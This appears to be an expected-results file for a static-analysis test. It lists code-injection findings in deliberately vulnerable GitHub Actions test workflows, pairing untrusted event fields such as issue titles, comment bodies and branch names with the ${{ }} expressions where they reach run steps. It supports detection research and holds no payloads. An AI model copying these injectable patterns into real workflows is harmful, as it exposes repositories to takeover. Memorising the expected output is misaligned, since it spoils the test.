| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user. | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | -| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | -| .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | -| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | -| .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | .github/workflows/artifactpoisoning3.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | ${{ steps.prepare.outputs.pr }} | -| .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | -| .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | .github/workflows/artifactpoisoning5.yml:8:9:16:6 | Uses Step | .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | ${{ steps.artifact.outputs.content }} | -| .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | -| .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | ${{ steps.artifact2.outputs.pr_number }} | -| .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning7.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | -| .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning8.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | -| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | -| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | ${{ steps.foo.outputs.result }} | -| .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | .github/actions/action5/action.yml:28:16:28:52 | github.event.pull_request.body | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | ${{ steps.foo.outputs.result2 }} | -| .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | ${{ steps.clone.outputs.result }} | -| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | -| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | -| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | -| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | -| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | -| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | -| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | -| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | -| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | -| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | -| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | -| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | -| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | -| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | -| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | -| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | -| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | -| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | -| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | ${{ steps.command.outputs.command-arguments }} | -| .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | .github/workflows/test1.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | -| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user. 
